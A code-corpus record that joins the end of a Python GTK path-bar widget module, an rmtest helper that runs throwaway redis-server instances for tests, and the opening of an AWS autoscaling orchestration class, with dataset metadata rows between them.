    pressed.set_state(gtk.STATE_SELECTED)
    self.queue_draw_area(*pressed.get_allocation_tuple())
    return
def __button_release_cb(self, widget, event):
    # Activate the part under the pointer, but only when the press and
    # the release happened on the same part.
    part = self.__part_at_xy(event.x, event.y)
    if self.__focal_part and self.__focal_part != part:
        # pointer was dragged off the pressed part: treat as a cancel
        pass
    elif part and self.__button_down:
        self.grab_focus()
        prev_active, redraw = self.__set_active(part)
        part.set_state(gtk.STATE_PRELIGHT)
        self.queue_draw_area(*part.get_allocation_tuple())
        if redraw:
            # the previously active part changed state; repaint it too
            self.queue_draw_area(*prev_active.get_allocation_tuple())
    self.__button_down = False
    return
# def __key_release_cb(self, widget, event):
# part = None
# # left key pressed
# if event.keyval == 65363:
# part = self.get_left_part()
# # right key pressed
# elif event.keyval == 65361:
# part = self.get_right_part()
# if not part: return
# prev_active = self.set_active(part)
# self.queue_draw_area(*part.allocation)
# if prev_active:
# self.queue_draw_area(*prev_active.allocation)
# part.emit("clicked", event.copy())
# return
def __realize_cb(self, widget):
    # Load theme colours once the widget has a real style to read from.
    self.theme.load(widget.style)
    return

def __expose_cb(self, widget, event):
    # Repaint the widget; picks the scrolling or static drawing path.
    cr = widget.window.cairo_create()
    if self.theme.base_hack:
        # some themes need the base colour painted explicitly first
        cr.set_source_rgb(*self.theme.base_hack)
        cr.paint()
    if self.__scroll_xO:
        self.__draw_hscroll(cr)
    else:
        self.__draw_all(cr, event.area)
    del cr
    return
def __style_change_cb(self, widget, old_style):
    # Re-theme and re-measure every part after a GTK style change.
    # when alloc.width == 1, this is typical of an unallocated widget,
    # lets not break a sweat for nothing...
    if self.allocation.width == 1:
        return
    self.theme = self.__pick_theme()
    self.theme.load(widget.style)
    # reset the height request to the minimum so that, if part height
    # shrank, the widget can settle to a smaller size based on the new
    # font metrics (parts below may raise it again)
    self.set_size_request(-1, 28)
    parts = self.__parts
    self.__parts = []
    # recalc best fits, re-append then draw all
    for part in parts:
        if part.icon.pixbuf:
            # reload icons so they match the new theme
            part.icon.load_pixbuf()
        part.calc_size_requisition()
        self.__append(part)
    self.queue_draw()
    return
def __allocation_change_cb(self, widget, allocation):
    # Refit the parts whenever the widget is resized.
    if allocation.width == 1:
        # typical of an unallocated widget; nothing useful to do
        return
    path_w = self.__draw_width()
    if path_w == allocation.width:
        return
    elif path_w > allocation.width:
        # widget shrank: compress/hide parts to fit
        self.__shrink_check(allocation)
    else:
        # widget grew: let truncated parts expand again
        self.__grow_check(allocation.width, allocation)
    self.queue_draw()
    return
class PathPart:
    """A single clickable segment of a PathBar.

    Holds the segment's label markup, optional icon, allocation
    rectangle, gtk state and drawing shape, plus an optional click
    callback and user object.
    """

    def __init__(self, id, label=None, callback=None, obj=None):
        self.__requisition = (0,0)   # best-fit (w, h) from calc_size_requisition
        self.__layout = None         # pango.Layout for the label
        self.__pbar = None           # owning PathBar, set via set_pathbar()
        self.id = id
        self.allocation = [0, 0, 0, 0]   # [x, y, w, h] within the path bar
        self.state = gtk.STATE_NORMAL
        self.shape = PathBar.SHAPE_RECTANGLE
        self.callback = callback
        self.obj = obj
        self.set_label(label or "")
        self.icon = PathBarIcon()
        return

    def set_callback(self, cb):
        """Set the callable invoked when this part is activated."""
        self.callback = cb
        return

    def set_label(self, label):
        """Store *label* as escaped pango markup.

        Any <i>italic</i> tags supplied by the caller are preserved.
        """
        # escape special characters
        label = gobject.markup_escape_text(label.strip())
        # some hackery to preserve italics markup: markup_escape_text has
        # escaped the caller's <i> tags too, so turn those entities back
        # into real tags.  (Previously this replaced '<i>' with itself,
        # a no-op, so italic markup was shown escaped.)
        label = label.replace('&lt;i&gt;', '<i>').replace('&lt;/i&gt;', '</i>')
        self.label = label
        return

    def set_icon(self, stock_icon, size=gtk.ICON_SIZE_BUTTON):
        """Attach a stock icon of the given size to this part."""
        self.icon.specify(stock_icon, size)
        self.icon.load_pixbuf()
        return

    def set_state(self, gtk_state):
        """Set the gtk state used when drawing this part."""
        self.state = gtk_state
        return

    def set_shape(self, shape):
        """Set the PathBar.SHAPE_* constant used to outline this part."""
        self.shape = shape
        return

    def set_x(self, x):
        """Set the part's x position within the path bar."""
        self.allocation[0] = int(x)
        return

    def set_size(self, w, h):
        """Set the part's width/height (-1 leaves a dimension unchanged)
        and re-wrap the label layout to the new width."""
        if w != -1: self.allocation[2] = int(w)
        if h != -1: self.allocation[3] = int(h)
        self.__calc_layout_width(self.__layout, self.shape, self.__pbar)
        return

    def set_pathbar(self, path_bar):
        """Associate this part with its owning PathBar."""
        self.__pbar = path_bar
        return

    def get_x(self):
        return self.allocation[0]

    def get_width(self):
        return self.allocation[2]

    def get_height(self):
        return self.allocation[3]

    def get_label(self):
        return self.label

    def get_allocation(self):
        """Return the allocation as a gtk.gdk.Rectangle."""
        return gtk.gdk.Rectangle(*self.get_allocation_tuple())

    def get_allocation_tuple(self):
        """Return (x, y, w, h), mirrored horizontally for RTL layouts."""
        if self.__pbar.get_direction() != gtk.TEXT_DIR_RTL:
            return self.allocation
        x, y, w, h = self.allocation
        x = self.__pbar.allocation[2]-x-w
        return x, y, w, h

    def get_size_requisition(self):
        return self.__requisition

    def get_layout(self):
        return self.__layout

    def activate(self):
        """Make this part the path bar's active part."""
        self.__pbar.set_active(self)
        return

    def calc_size_requisition(self):
        """Compute and store the part's best-fit (w, h).

        Accounts for label extents, padding, an optional icon and the
        extra width the arrow shapes need; may raise the owning bar's
        height request.  Returns the (w, h) tuple.
        """
        pbar = self.__pbar
        # determine widget size base on label width
        self.__layout = self.__layout_text(self.label, pbar.get_pango_context())
        extents = self.__layout.get_pixel_extents()
        # calc text width + 2 * padding, text height + 2 * ypadding
        w = extents[1][2] + 2*pbar.theme.xpadding
        h = max(extents[1][3] + 2*pbar.theme.ypadding, pbar.get_size_request()[1])
        # if has icon add some more pixels on
        if self.icon.pixbuf:
            w += self.icon.pixbuf.get_width() + pbar.theme.spacing
            h = max(self.icon.pixbuf.get_height() + 2*pbar.theme.ypadding, h)
        # extend width depending on part shape ...
        if self.shape == PathBar.SHAPE_START_ARROW or \
            self.shape == PathBar.SHAPE_END_CAP:
            w += pbar.theme.arrow_width
        elif self.shape == PathBar.SHAPE_MID_ARROW:
            w += 2*pbar.theme.arrow_width
        # if height greater than current height request,
        # reset height request to higher value
        # i get the feeling this should be in set_size_request(), but meh
        if h > pbar.get_size_request()[1]:
            pbar.set_size_request(-1, h)
        self.__requisition = (w,h)
        return w, h

    def is_truncated(self):
        """True when the allocated width is smaller than the best fit."""
        return self.__requisition[0] != self.allocation[2]

    def __layout_text(self, text, pango_context):
        # build an end-ellipsized pango layout for the label markup
        layout = pango.Layout(pango_context)
        layout.set_markup('%s' % text)
        layout.set_ellipsize(pango.ELLIPSIZE_END)
        return layout

    def __calc_layout_width(self, layout, shape, pbar):
        # set layout width: subtract padding, icon width and whatever
        # extra the part's arrow shape consumes
        if self.icon.pixbuf:
            icon_w = self.icon.pixbuf.get_width() + pbar.theme.spacing
        else:
            icon_w = 0
        w = self.allocation[2]
        if shape == PathBar.SHAPE_MID_ARROW:
            layout.set_width((w - 2*pbar.theme.arrow_width -
                              2*pbar.theme.xpadding - icon_w)*pango.SCALE)
        elif shape == PathBar.SHAPE_START_ARROW or \
            shape == PathBar.SHAPE_END_CAP:
            layout.set_width((w - pbar.theme.arrow_width - 2*pbar.theme.xpadding -
                              icon_w)*pango.SCALE)
        else:
            layout.set_width((w - 2*pbar.theme.xpadding - icon_w)*pango.SCALE)
        return
class PathBarIcon:
def __init__(self, name=None, size=None):
self.name = name
self.size = size
self.pixbuf = None
return
def specify(self, name, size):
self.name = name
self.size = size
return
def load_pixbuf(self):
if not self.name:
print 'Error: No icon specified.'
return
if not self.size:
print 'Note: No icon size specified.'
def render_icon(icon_set, name, size):
self.pixbuf = icon_set.render_icon(
style,
gtk.TEXT_DIR_NONE,
gtk.STATE_NORMAL,
self.size or gtk.ICON_SIZE_BUTTON,
gtk.Image(),
None)
return
style = gtk.Style()
icon_set = style.lookup_icon_set(self.name)
if not icon_set:
t = gtk.icon_theme_get_default()
self.pixbuf = t.lookup_icon(self.name, self.size, 0).load_icon()
else:
icon_set = style.lookup_icon_set(self.name)
render_icon(icon_set, self.name, self.size)
if not self.pixbuf:
print 'Error: No name failed to match any installed icon set.'
self.name = gtk.STOCK_MISSING_IMAGE
icon_set = style.lookup_icon_set(self.name)
render_icon(icon_set, self.name, self.size)
return
class PathBarThemeHuman:
    # Colour/metric theme for the PathBar under the Ubuntu "Human" theme.
    # PRELIT_NORMAL / PRELIT_ACTIVE are custom pseudo-state keys used in
    # bg_colors alongside the standard gtk.STATE_* constants.
    PRELIT_NORMAL = 10
    PRELIT_ACTIVE = 11
    curvature = 2.5          # corner radius of end caps, px
    min_part_width = 56      # narrowest a part may be squeezed, px
    xpadding = 8             # horizontal label padding, px
    ypadding = 2             # vertical label padding, px
    spacing = 4              # gap between icon and label, px
    arrow_width = 13         # extra width an arrow point consumes, px
    scroll_duration_ms = 150
    scroll_fps = 50
    animate = gtk.settings_get_default().get_property("gtk-enable-animations")

    def __init__(self):
        return

    def load(self, style):
        # Derive the gradient/line colour tables from the current gtk
        # style.  bg_colors maps state -> (gradient top, gradient bottom).
        mid = style.mid
        dark = style.dark
        light = style.light
        text = style.text
        active = rgb.mix_color(mid[gtk.STATE_NORMAL],
                               mid[gtk.STATE_SELECTED], 0.25)
        self.bg_colors = {
            gtk.STATE_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.2)),
                               f(mid[gtk.STATE_NORMAL])),
            gtk.STATE_ACTIVE: (f(rgb.shade(active, 1.2)),
                               f(active)),
            gtk.STATE_SELECTED: (f(mid[gtk.STATE_ACTIVE]),
                                 f(mid[gtk.STATE_ACTIVE])),
            self.PRELIT_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.25)),
                                 f(rgb.shade(mid[gtk.STATE_NORMAL], 1.05))),
            self.PRELIT_ACTIVE: (f(rgb.shade(active, 1.25)),
                                 f(rgb.shade(active, 1.05)))
            }
        self.dark_line_colors = {
            gtk.STATE_NORMAL: f(dark[gtk.STATE_NORMAL]),
            gtk.STATE_ACTIVE: f(dark[gtk.STATE_ACTIVE]),
            gtk.STATE_SELECTED: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.9)),
            gtk.STATE_PRELIGHT: f(dark[gtk.STATE_PRELIGHT])
            }
        self.light_line_colors = {
            gtk.STATE_NORMAL: f(light[gtk.STATE_NORMAL]),
            gtk.STATE_ACTIVE: f(light[gtk.STATE_ACTIVE]),
            gtk.STATE_SELECTED: None,
            gtk.STATE_PRELIGHT: f(light[gtk.STATE_PRELIGHT])
            }
        # maps a part's gtk state to the state used for label text colour
        self.text_state = {
            gtk.STATE_NORMAL: gtk.STATE_NORMAL,
            gtk.STATE_ACTIVE: gtk.STATE_ACTIVE,
            gtk.STATE_SELECTED: gtk.STATE_ACTIVE,
            gtk.STATE_PRELIGHT: gtk.STATE_PRELIGHT
            }
        # optional solid background painted before the parts; None = skip
        self.base_hack = None
        return
class PathBarThemeHumanClearlooks(PathBarThemeHuman):
    """Human-Clearlooks variant: brighter gradients than the base theme.

    Note: this class previously defined __init__ twice; the duplicate
    (which silently shadowed the first definition) has been removed.
    """

    def __init__(self):
        PathBarThemeHuman.__init__(self)
        return

    def load(self, style):
        # Same structure as PathBarThemeHuman.load but with different
        # shade factors tuned for Clearlooks.
        mid = style.mid
        dark = style.dark
        light = style.light
        text = style.text
        active = rgb.mix_color(mid[gtk.STATE_NORMAL],
                               mid[gtk.STATE_SELECTED], 0.25)
        self.bg_colors = {
            gtk.STATE_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.20)),
                               f(rgb.shade(mid[gtk.STATE_NORMAL], 1.05))),
            gtk.STATE_ACTIVE: (f(rgb.shade(active, 1.20)),
                               f(rgb.shade(active, 1.05))),
            gtk.STATE_SELECTED: (f(rgb.shade(mid[gtk.STATE_ACTIVE], 1.15)),
                                 f(mid[gtk.STATE_ACTIVE])),
            self.PRELIT_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.35)),
                                 f(rgb.shade(mid[gtk.STATE_NORMAL], 1.15))),
            self.PRELIT_ACTIVE: (f(rgb.shade(active, 1.35)),
                                 f(rgb.shade(active, 1.15)))
            }
        self.dark_line_colors = {
            gtk.STATE_NORMAL: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.975)),
            gtk.STATE_ACTIVE: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.975)),
            gtk.STATE_SELECTED: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.95)),
            gtk.STATE_PRELIGHT: f(dark[gtk.STATE_PRELIGHT])
            }
        self.light_line_colors = {
            gtk.STATE_NORMAL: None,
            gtk.STATE_ACTIVE: None,
            gtk.STATE_SELECTED: f(mid[gtk.STATE_ACTIVE]),
            gtk.STATE_PRELIGHT: f(light[gtk.STATE_PRELIGHT])
            }
        self.text_state = {
            gtk.STATE_NORMAL: gtk.STATE_NORMAL,
            gtk.STATE_ACTIVE: gtk.STATE_ACTIVE,
            gtk.STATE_SELECTED: gtk.STATE_NORMAL,
            gtk.STATE_PRELIGHT: gtk.STATE_PRELIGHT
            }
        self.base_hack = None
        return
class PathBarThemeDust(PathBarThemeHuman):
    # Theme variant for the "Dust" / "Dust Sand" GTK themes; inherits all
    # metrics from PathBarThemeHuman and overrides only the colours.

    def __init__(self):
        PathBarThemeHuman.__init__(self)
        return

    def load(self, style):
        # Derive colour tables from the gtk style; note the active colour
        # mixes against light[SELECTED] (not mid) for a softer highlight.
        mid = style.mid
        dark = style.dark
        light = style.light
        text = style.text
        active = rgb.mix_color(mid[gtk.STATE_NORMAL],
                               light[gtk.STATE_SELECTED], 0.3)
        self.bg_colors = {
            gtk.STATE_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.3)),
                               f(mid[gtk.STATE_NORMAL])),
            gtk.STATE_ACTIVE: (f(rgb.shade(active, 1.3)),
                               f(active)),
            gtk.STATE_SELECTED: (f(rgb.shade(mid[gtk.STATE_NORMAL], 0.95)),
                                 f(rgb.shade(mid[gtk.STATE_NORMAL], 0.95))),
            self.PRELIT_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.35)),
                                 f(rgb.shade(mid[gtk.STATE_NORMAL], 1.15))),
            self.PRELIT_ACTIVE: (f(rgb.shade(active, 1.35)),
                                 f(rgb.shade(active, 1.15)))
            }
        self.dark_line_colors = {
            gtk.STATE_NORMAL: f(dark[gtk.STATE_ACTIVE]),
            gtk.STATE_ACTIVE: f(dark[gtk.STATE_ACTIVE]),
            gtk.STATE_SELECTED: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.95)),
            gtk.STATE_PRELIGHT: f(dark[gtk.STATE_PRELIGHT])
            }
        self.light_line_colors = {
            gtk.STATE_NORMAL: f(light[gtk.STATE_NORMAL]),
            gtk.STATE_ACTIVE: f(light[gtk.STATE_NORMAL]),
            gtk.STATE_SELECTED: None,
            gtk.STATE_PRELIGHT: f(light[gtk.STATE_PRELIGHT])
            }
        self.text_state = {
            gtk.STATE_NORMAL: gtk.STATE_NORMAL,
            gtk.STATE_ACTIVE: gtk.STATE_ACTIVE,
            gtk.STATE_SELECTED: gtk.STATE_NORMAL,
            gtk.STATE_PRELIGHT: gtk.STATE_PRELIGHT
            }
        self.base_hack = None
        return
class PathBarThemeNewWave(PathBarThemeHuman):
    # Theme variant for the "New Wave" GTK theme: flatter gradients,
    # tighter corner curvature, and an explicit light base background.
    curvature = 1.5

    def __init__(self):
        PathBarThemeHuman.__init__(self)
        return

    def load(self, style):
        mid = style.mid
        dark = style.dark
        light = style.light
        text = style.text
        active = rgb.mix_color(mid[gtk.STATE_NORMAL],
                               light[gtk.STATE_SELECTED], 0.5)
        self.bg_colors = {
            gtk.STATE_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.01)),
                               f(mid[gtk.STATE_NORMAL])),
            gtk.STATE_ACTIVE: (f(rgb.shade(active, 1.01)),
                               f(active)),
            gtk.STATE_SELECTED: (f(rgb.shade(mid[gtk.STATE_NORMAL], 0.95)),
                                 f(rgb.shade(mid[gtk.STATE_NORMAL], 0.95))),
            self.PRELIT_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.2)),
                                 f(rgb.shade(mid[gtk.STATE_NORMAL], 1.15))),
            self.PRELIT_ACTIVE: (f(rgb.shade(active, 1.2)),
                                 f(rgb.shade(active, 1.15)))
            }
        self.dark_line_colors = {
            gtk.STATE_NORMAL: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.95)),
            gtk.STATE_ACTIVE: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.95)),
            gtk.STATE_SELECTED: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.95)),
            gtk.STATE_PRELIGHT: f(dark[gtk.STATE_PRELIGHT])
            }
        self.light_line_colors = {
            gtk.STATE_NORMAL: f(rgb.shade(light[gtk.STATE_NORMAL], 1.2)),
            gtk.STATE_ACTIVE: f(rgb.shade(light[gtk.STATE_NORMAL], 1.2)),
            gtk.STATE_SELECTED: None,
            gtk.STATE_PRELIGHT: f(rgb.shade(light[gtk.STATE_PRELIGHT], 1.2))
            }
        self.text_state = {
            gtk.STATE_NORMAL: gtk.STATE_NORMAL,
            gtk.STATE_ACTIVE: gtk.STATE_ACTIVE,
            gtk.STATE_SELECTED: gtk.STATE_NORMAL,
            gtk.STATE_PRELIGHT: gtk.STATE_PRELIGHT
            }
        # New Wave leaves artifacts unless the base is painted explicitly
        self.base_hack = f(gtk.gdk.color_parse("#F2F2F2"))
        return
class PathBarThemeHicolor:
    # High-contrast theme: flat (non-gradient) colours taken straight
    # from the gtk style, with generous padding for legibility.
    PRELIT_NORMAL = 10
    PRELIT_ACTIVE = 11
    curvature = 0.5
    min_part_width = 56
    xpadding = 15
    ypadding = 10
    spacing = 10
    arrow_width = 15
    scroll_duration_ms = 150
    scroll_fps = 50
    animate = gtk.settings_get_default().get_property("gtk-enable-animations")

    def __init__(self):
        return

    def load(self, style):
        # Flat colours: gradient top == gradient bottom for every state.
        mid = style.mid
        dark = style.dark
        light = style.light
        text = style.text
        self.bg_colors = {
            gtk.STATE_NORMAL: (f(mid[gtk.STATE_NORMAL]),
                               f(mid[gtk.STATE_NORMAL])),
            gtk.STATE_ACTIVE: (f(mid[gtk.STATE_ACTIVE]),
                               f(mid[gtk.STATE_ACTIVE])),
            gtk.STATE_SELECTED: (f(mid[gtk.STATE_SELECTED]),
                                 f(mid[gtk.STATE_SELECTED])),
            self.PRELIT_NORMAL: (f(mid[gtk.STATE_PRELIGHT]),
                                 f(mid[gtk.STATE_PRELIGHT])),
            self.PRELIT_ACTIVE: (f(mid[gtk.STATE_PRELIGHT]),
                                 f(mid[gtk.STATE_PRELIGHT]))
            }
        self.dark_line_colors = {
            gtk.STATE_NORMAL: f(dark[gtk.STATE_NORMAL]),
            gtk.STATE_ACTIVE: f(dark[gtk.STATE_ACTIVE]),
            gtk.STATE_SELECTED: f(dark[gtk.STATE_SELECTED]),
            gtk.STATE_PRELIGHT: f(dark[gtk.STATE_PRELIGHT])
            }
        self.light_line_colors = {
            gtk.STATE_NORMAL: f(light[gtk.STATE_NORMAL]),
            gtk.STATE_ACTIVE: f(light[gtk.STATE_ACTIVE]),
            gtk.STATE_SELECTED: None,
            gtk.STATE_PRELIGHT: f(light[gtk.STATE_PRELIGHT])
            }
        self.text_state = {
            gtk.STATE_NORMAL: gtk.STATE_NORMAL,
            gtk.STATE_ACTIVE: gtk.STATE_ACTIVE,
            gtk.STATE_SELECTED: gtk.STATE_SELECTED,
            gtk.STATE_PRELIGHT: gtk.STATE_PRELIGHT
            }
        self.base_hack = None
        return
class PathBarThemes:
    # Registry mapping GTK theme names to PathBar theme classes.
    # Looked up by PathBar.__pick_theme(); unknown names fall back
    # to PathBarThemeHuman.
    DICT = {
        "Human": PathBarThemeHuman,
        "Human-Clearlooks": PathBarThemeHumanClearlooks,
        "HighContrastInverse": PathBarThemeHicolor,
        "HighContrastLargePrintInverse": PathBarThemeHicolor,
        "Dust": PathBarThemeDust,
        "Dust Sand": PathBarThemeDust,
        "New Wave": PathBarThemeNewWave
        }
class NavigationBar(PathBar):
def __init__(self, group=None):
    """Create an empty navigation bar (a PathBar with id-keyed parts)."""
    PathBar.__init__(self)
    self.set_size_request(-1, 28)
    self.id_to_part = {}
    # add_with_id() compares against last_label before any assignment;
    # initialise it here so the first call does not raise AttributeError.
    self.last_label = None
    return
def add_with_id(self, label, callback, id, obj, icon=None):
    """
    Add a new button with the given label/callback
    If there is the same id already, replace the existing one
    with the new one
    """
    if label == self.last_label:
        #ignoring duplicate
        return
    #print "Adding %s(%d)" % (label, id)
    # check if we have the button of that id or need a new one
    if id == 1 and len(self.id_to_part) > 0:
        # We already have the first item, just don't do anything
        return
    else:
        # drop this id and everything "deeper" than it before re-adding
        for i in self.id_to_part:
            part = self.id_to_part[i]
            if part.id >= id:
                self.remove(part)
        part = PathPart(id, label, callback, obj)
        part.set_pathbar(self)
        self.id_to_part[id] = part
        # deferred append so removal/redraw settles first
        gobject.timeout_add(150, self.append, part)
        if icon: part.set_icon(icon)
    self.last_label = label
    return
def remove_id(self, id):
    """Remove the navigation button registered under *id*, if any."""
    part = self.id_to_part.pop(id, None)
    if part is None:
        return
    self.remove(part)
    self.last_label = None
    return
def remove_all(self):
    """remove all elements"""
    # BUG FIX: this previously assigned self.__parts, which name-mangles
    # to _NavigationBar__parts and therefore never touched PathBar's
    # private _PathBar__parts list -- the bar was never actually emptied.
    self._PathBar__parts = []
    self.id_to_part = {}
    self.queue_draw()
    self.last_label = None
    return
def get_button_from_id(self, id):
    """
    return the button for the given id (or None)
    """
    return self.id_to_part.get(id)
def get_label(self, id):
"""
Return the label of the navigation button with the given id
"""
if not id in self.id_to_part:
return
| 30.763752 | 86 | 0.562799 | 42,713 | 0.979139 | 0 | 0 | 0 | 0 | 0 | 0 | 5,695 | 0.13055 |
6349977120b1f7e73c34cb0ef18c1955caa9b170 | 5,971 | py | Python | .venv/lib/python3.8/site-packages/rmtest/disposableredis/__init__.py | nuruddinsayeed/ru102py | ef43464a93dd74e24f9447ed5014acb35b9a650e | [
"MIT"
] | null | null | null | .venv/lib/python3.8/site-packages/rmtest/disposableredis/__init__.py | nuruddinsayeed/ru102py | ef43464a93dd74e24f9447ed5014acb35b9a650e | [
"MIT"
] | null | null | null | .venv/lib/python3.8/site-packages/rmtest/disposableredis/__init__.py | nuruddinsayeed/ru102py | ef43464a93dd74e24f9447ed5014acb35b9a650e | [
"MIT"
] | null | null | null | import subprocess
import socket
import redis
import time
import os
import os.path
import sys
import warnings
import random
REDIS_DEBUGGER = os.environ.get('REDIS_DEBUGGER', None)
REDIS_SHOW_OUTPUT = int(os.environ.get(
'REDIS_VERBOSE', 1 if REDIS_DEBUGGER else 0))
def get_random_port():
    """Return a random TCP port in [1025, 10000) that is currently free.

    Availability is probed by binding a throwaway socket to the port;
    ports that are already in use are skipped and a new candidate is
    drawn.  (The previous implementation called listen(port) on an
    unbound socket -- which never tests the candidate port -- and caught
    an undefined name ``Error``, which would have raised NameError.)
    """
    while True:
        port = random.randrange(1025, 10000)
        sock = socket.socket()
        try:
            sock.bind(('127.0.0.1', port))
        except socket.error:
            # port taken (or otherwise unbindable); try another
            continue
        finally:
            sock.close()
        return port
class Client(redis.StrictRedis):
    # A StrictRedis client bound to a DisposableRedis server on localhost.

    def __init__(self, disposable_redis, port):
        redis.StrictRedis.__init__(self, port=port)
        # keep a handle on the owning server so tests can reload its rdb
        self.dr = disposable_redis

    def retry_with_rdb_reload(self):
        # Generator for tests: iteration 1 runs against live data, then
        # the rdb is dumped and reloaded, and iteration 2 re-verifies
        # the same assertions against the reloaded dataset.
        yield 1
        self.dr.dump_and_reload()
        yield 2
class DisposableRedis(object):
    """Manage a throwaway redis-server process for tests.

    Usable as a context manager: ``with DisposableRedis() as r: ...``
    yields a connected Client and tears the server down on exit.
    """

    def __init__(self, port=None, path='redis-server', **extra_args):
        """
        :param port: port number to start the redis server on.
            Specify none to automatically generate
        :type port: int|None
        :param extra_args: any extra arguments kwargs will
            be passed to redis server as --key val
        """
        self._port = port
        # this will hold the actual port the redis is listening on.
        # It's equal to `_port` unless `_port` is None
        # in that case `port` is randomly generated
        self.port = None
        # when an explicit port is given we attach to an externally
        # managed server and never spawn/kill a process ourselves
        self._is_external = True if port else False
        self.use_aof = extra_args.pop('use_aof', False)
        self.extra_args = []
        for k, v in extra_args.items():
            self.extra_args.append('--%s' % k)
            if isinstance(v, (list, tuple)):
                self.extra_args += list(v)
            else:
                self.extra_args.append(v)
        self.path = path                # redis-server executable
        self.errored = False            # set when a reload fails, dumps output
        self.dumpfile = None            # per-port rdb filename
        self.aoffile = None             # per-port aof filename
        self.pollfile = None
        self.process = None             # subprocess.Popen handle

    def force_start(self):
        # Treat the instance as internally managed even though a fixed
        # port was supplied, so start()/stop() control the process.
        self._is_external = False

    def _get_output(self):
        # Return captured server stdout for error reporting (empty when
        # output was passed through to the console or no process exists).
        if not self.process:
            return ''
        return '' if REDIS_SHOW_OUTPUT else self.process.stdout.read()

    def _start_process(self):
        # Spawn redis-server (optionally under REDIS_DEBUGGER) and block
        # until it answers PING or dies / times out.
        if self._is_external:
            return

        if REDIS_DEBUGGER:
            debugger = REDIS_DEBUGGER.split()
            args = debugger + self.args
        else:
            args = self.args

        stdout = None if REDIS_SHOW_OUTPUT else subprocess.PIPE
        if REDIS_SHOW_OUTPUT:
            sys.stderr.write("Executing: {}".format(repr(args)))
        self.process = subprocess.Popen(
            args,
            stdin=sys.stdin,
            stdout=stdout,
            stderr=sys.stderr,
        )

        begin = time.time()
        while True:
            try:
                self.client().ping()
                break
            except (redis.ConnectionError, redis.ResponseError):
                # not up yet -- fail fast if the process already exited
                self.process.poll()
                if self.process.returncode is not None:
                    raise RuntimeError(
                        "Process has exited with code {}\n. Redis output: {}"
                        .format(self.process.returncode, self._get_output()))

                if time.time() - begin > 300:
                    raise RuntimeError(
                        'Cannot initialize client (waited 5mins)')

                time.sleep(0.1)

    def start(self):
        """
        Start the server. To stop the server you should call stop()
        accordingly
        """
        if self._port is None:
            self.port = get_random_port()
        else:
            self.port = self._port

        # per-port data filenames so concurrent instances don't collide
        if not self.dumpfile:
            self.dumpfile = 'dump.%s.rdb' % self.port
        if not self.aoffile:
            self.aoffile = 'appendonly.%s.aof' % self.port

        self.args = [self.path,
                     '--port', str(self.port),
                     '--save', '',
                     '--dbfilename', self.dumpfile]
        if self.use_aof:
            self.args += ['--appendonly', 'yes',
                          '--appendfilename', self.aoffile]
        self.args += self.extra_args

        self._start_process()

    def _cleanup_files(self):
        # Best-effort removal of the data files created for this port.
        for f in (self.aoffile, self.dumpfile):
            try:
                os.unlink(f)
            except OSError:
                pass

    def stop(self, for_restart=False):
        # Kill the process; keep the data files when we intend to restart
        # and reload them.
        if self._is_external:
            return
        self.process.terminate()
        if not for_restart:
            self._cleanup_files()

    def __enter__(self):
        self.start()
        return self.client()

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.stop()
        if exc_val or self.errored:
            # surface the server's output when the test body failed
            sys.stderr.write("Redis output: {}\n".format(self._get_output()))

    def _wait_for_child(self):
        # Wait until file is available
        r = self.client()
        while True:
            info = r.info('persistence')
            if info['aof_rewrite_scheduled'] or info['aof_rewrite_in_progress']:
                time.sleep(0.1)
            else:
                break

    def dump_and_reload(self, restart_process=False):
        """
        Dump the rdb and reload it, to test for serialization errors
        """
        conn = self.client()
        if restart_process:
            if self._is_external:
                warnings.warn('Tied to an external process. Cannot restart')
                return
            # NOTE: redundant re-import; `time` is already imported at
            # module level
            import time
            conn.bgrewriteaof()
            self._wait_for_child()
            self.stop(for_restart=True)
            self.start()
        else:
            conn.save()
            try:
                conn.execute_command('DEBUG', 'RELOAD')
            except redis.RedisError as err:
                # remember the failure so __exit__ dumps the server log
                self.errored = True
                raise err

    def client(self):
        """
        :rtype: redis.StrictRedis
        """
        return Client(self, self.port)
| 28.433333 | 80 | 0.54212 | 5,412 | 0.906381 | 98 | 0.016413 | 0 | 0 | 0 | 0 | 1,126 | 0.188578 |
634aec23f0d6252efab55e311a6bc96d9c7f0eb3 | 16,843 | py | Python | disco_aws_automation/disco_autoscale.py | Angakkuq/asiaq-aws | f7ddec9fc60aef685f372cbaefee2b08ae18b6a0 | [
"BSD-2-Clause"
] | null | null | null | disco_aws_automation/disco_autoscale.py | Angakkuq/asiaq-aws | f7ddec9fc60aef685f372cbaefee2b08ae18b6a0 | [
"BSD-2-Clause"
] | 4 | 2016-03-22T17:04:04.000Z | 2016-03-23T18:03:45.000Z | disco_aws_automation/disco_autoscale.py | Angakkuit/asiaq-aws | f7ddec9fc60aef685f372cbaefee2b08ae18b6a0 | [
"BSD-2-Clause"
] | null | null | null | '''Contains DiscoAutoscale class that orchestrates AWS Autoscaling'''
import logging
import random
import boto
import boto.ec2
import boto.ec2.autoscale
import boto.ec2.autoscale.launchconfig
import boto.ec2.autoscale.group
from boto.ec2.autoscale.policy import ScalingPolicy
from boto.exception import BotoServerError
import boto3
from .resource_helper import throttled_call
DEFAULT_TERMINATION_POLICIES = ["OldestLaunchConfiguration"]
class DiscoAutoscale(object):
'''Class orchestrating autoscaling'''
def __init__(self, environment_name, autoscaling_connection=None, boto3_autoscaling_connection=None):
    # environment_name prefixes all group/config names managed here;
    # connections default to fresh boto2/boto3 autoscaling clients but
    # can be injected for testing.
    self.environment_name = environment_name
    self.connection = autoscaling_connection or boto.ec2.autoscale.AutoScaleConnection(
        use_block_device_types=True
    )
